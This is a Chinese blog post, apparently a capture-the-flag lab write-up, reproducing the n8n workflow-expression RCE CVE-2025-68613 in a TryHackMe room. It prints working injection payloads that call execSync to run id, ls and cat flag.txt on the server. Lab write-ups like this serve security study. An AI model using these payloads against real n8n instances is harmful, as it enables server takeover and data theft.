首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >复现n8n RCE(CVE-2025-68613)CVSS 9.9漏洞利用详细版

复现n8n RCE(CVE-2025-68613)CVSS 9.9漏洞利用详细版

作者头像
qife122
发布2026-01-06 14:17:29
发布2026-01-06 14:17:29
3480
举报

漏洞概述

n8n工作流自动化平台在其工作流表达式评估系统中存在一个严重的任意代码执行漏洞。已登录n8n的用户,可以通过在创建工作流时植入恶意表达式,利用n8n表达式评估系统的缺陷,在服务器上执行任意代码,最终可能接管服务器。

受影响版本

  • 受影响版本:n8n < v1.122.0
  • 已修复版本:n8n >= v1.122.0

漏洞复现步骤

漏洞利用可参考该链接:

https://github.com/wioui/n8n-CVE-2025-68613-exploit

漏洞复现使用tryhackme环境链接地址:

https://tryhackme.com/room/n8ncve202568613

1.启动安装有n8n的漏洞主机

2.启动攻击主机

3.攻击机启动后,打开火狐浏览器

4.在攻击机中的火狐浏览器中输入漏洞主机n8n地址:http://10.82.187.254:5678访问漏洞主机的n8n服务

5.输入邮箱账号、密码登录n8n

6.登录n8n成功后,点击start from scratch

7.再点击add first step

8.搜索Manual Trigger

9.添加Manual Trigger

10.点击Manual Trigger,搜索Edit Fields(Set),并添加Edit Fields(Set)

11.设置edit字段的名称为name,value中输入漏洞利用代码,该漏洞利用代码用于获取当前主机的id,设置完后点击Execute step执行漏洞利用代码

代码语言:javascript
复制
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

12.漏洞利用代码执行后,在output中查看到输出当前用户id的结果

13.将id替换成ls,查看当前目录中的文件,点击Execute step执行后可在output中看到当前目录中有flag.txt文件

代码语言:javascript
复制
{{ (function(){ return this.process.mainModule.require('child_process').execSync('ls').toString() })() }}

14.将ls替换成cat flag.txt,用于获取flag.txt文件内容,点击Execute step执行后,可在output中查看到flag.txt的内容"THM{n8n_exposed_workflow}"

检测一下flag

结果是正确的

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-12-30,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全技术点滴分享 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞概述
  • 受影响版本
  • 漏洞复现步骤
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档